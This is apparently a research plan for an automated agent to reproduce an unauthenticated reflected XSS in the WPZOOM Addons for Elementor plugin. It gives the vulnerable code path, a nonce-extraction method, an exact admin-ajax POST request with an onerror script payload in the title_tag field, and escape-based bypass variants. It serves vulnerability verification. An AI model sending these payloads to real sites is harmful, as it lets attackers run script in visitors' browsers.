Research Plan: Unauthenticated Reflected XSS in WPZOOM Addons for Elementor

1. Vulnerability Summary

The WPZOOM Addons for Elementor – Starter Templates & Widgets plugin (versions <= 1.3.4) is vulnerable to Unauthenticated Reflected Cross-Site Scripting. The vulnerability exists in the WPZOOM_Elementor_Ajax_Post_Grid class, specifically within the render_title() method. The title_tag parameter, which is passed via an AJAX request, is used to dynamically generate HTML tags without sufficient sanitization or output escaping. An attacker can inject arbitrary HTML/JavaScript into this parameter, which is then reflected back to the user when the AJAX response is rendered.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: wpz_posts_grid_load_more
• Hook: Registered via wp_ajax_nopriv_wpz_posts_grid_load_more (accessible to unauthenticated users).
• Vulnerable Parameter: title_tag (nested inside the JSON-encoded posts_data POST parameter).
• Authentication: None required.
• Preconditions:
  1. A valid WordPress nonce for the action wpz_posts_grid_load_more.
  2. At least one published post must exist on the site (to satisfy the WP_Query condition and trigger the inclusion of the layout file).

3. Code Flow

1. Entry Point: A POST request is sent to admin-ajax.php with action=wpz_posts_grid_load_more.
2. Nonce Verification: includes/wpzoom-elementor-ajax-posts-grid.php (Line 81) calls wp_verify_nonce( $_POST['nonce'], 'wpz_posts_grid_load_more' ).
3. Data Processing:
   • $_POST['posts_data'] is sanitized with sanitize_text_field() and then json_decode()ed into an array $data (Lines 85-86).
   • self::$settings is populated with this array (Line 88).
4. Query Execution: WP_Query is executed using parameters from $data (Lines 90-116).
5. Layout Inclusion: If the query returns posts, the plugin includes a layout file, e.g., includes/widgets/posts-grid/layouts/layout-1.php (Line 120).
6. Sink: The layout file (not provided, but inferred by class logic) calls $this->render_title().
7. Execution: render_title() (Lines 216-234) retrieves $title_tag from $settings. It then echos this value directly into the HTML output:

   <<?php echo $title_tag; // WPCS: XSS OK. ?> class="title">
   

   The comment // WPCS: XSS OK. indicates that the developer explicitly bypassed security linting for this line.

4. Nonce Acquisition Strategy

The nonce wpz_posts_grid_load_more is required for the exploit. It is typically localized for the frontend when a "Posts Grid" widget is present on a page.

1. Setup: Create a page containing a "Posts Grid" widget. Since this is an Elementor plugin, we need to ensure the widget's assets are loaded.
2. Identification: The plugin likely localizes the nonce in a variable. Based on common naming conventions in this plugin (like wpzoom_admin_data in the main file), look for a variable named something like wpz_posts_grid_settings.
3. Execution:
   • Use wp post create to create a test page.
   • Navigate to the page using browser_navigate.
   • Extract the nonce using browser_eval:

     // (Inferred variable name, to be verified by the agent)
     window.wpz_posts_grid_settings?.nonce 
     // OR search for any localized object containing the action string
     

5. Exploitation Strategy

1. Target: /wp-admin/admin-ajax.php
2. Method: POST
3. Headers: Content-Type: application/x-www-form-urlencoded
4. Parameters:
   • action: wpz_posts_grid_load_more
   • nonce: [EXTRACTED_NONCE]
   • offset: 0
   • posts_data: A JSON string containing the payload:

     {
       "posts_per_page": 1,
       "show_title": "yes",
       "title_tag": "img src=x onerror=alert(document.domain)",
       "grid_style": 1
     }
     

5. Payload Formulation: The title_tag value img src=x onerror=alert(document.domain) will result in the following HTML in the response:

   <img src=x onerror=alert(document.domain) class="title">
   

6. Test Data Setup

1. Create a Post: Ensure the grid has data to render.

   wp post create --post_type=post --post_title="PoC Post" --post_status=publish
   

2. Create a Page with Widget: To trigger nonce localization. If the exact Elementor block is unknown, the agent should search the plugin for add_shortcode or widget registration names.

   # Search for widget name
   grep -r "get_name" includes/widgets/
   

3. Publish the Page:

   wp post create --post_type=page --post_title="XSS Test Page" --post_status=publish --post_content="[wpzoom_posts_grid]" # (Guessing shortcode if exists)
   

7. Expected Results

• The AJAX response (HTML) should contain the injected payload: <img src=x onerror=alert(document.domain) class="title">.
• In a browser context, the alert box would execute.

8. Verification Steps

1. Response Check: Use the http_request tool and verify that the response body contains the string onerror=alert(document.domain).
2. Path Confirmation: Verify the code path by checking if the plugin's render_title function is indeed called during the AJAX request by observing the response structure.

9. Alternative Approaches

• Tag Breakout: If the title_tag is used in multiple places (like the closing tag), try script>alert(1)</script.
• JSON Encoding: If sanitize_text_field interferes with the payload, remember that posts_data is JSON-encoded, so double-escaping or Unicode escapes (\u003c) might be necessary depending on how stripslashes and json_decode handle the input.
• Different Layouts: The grid_style parameter determines which layout file is included. If layout-1.php is missing or doesn't call render_title, try other integers (1, 2, 3, etc.).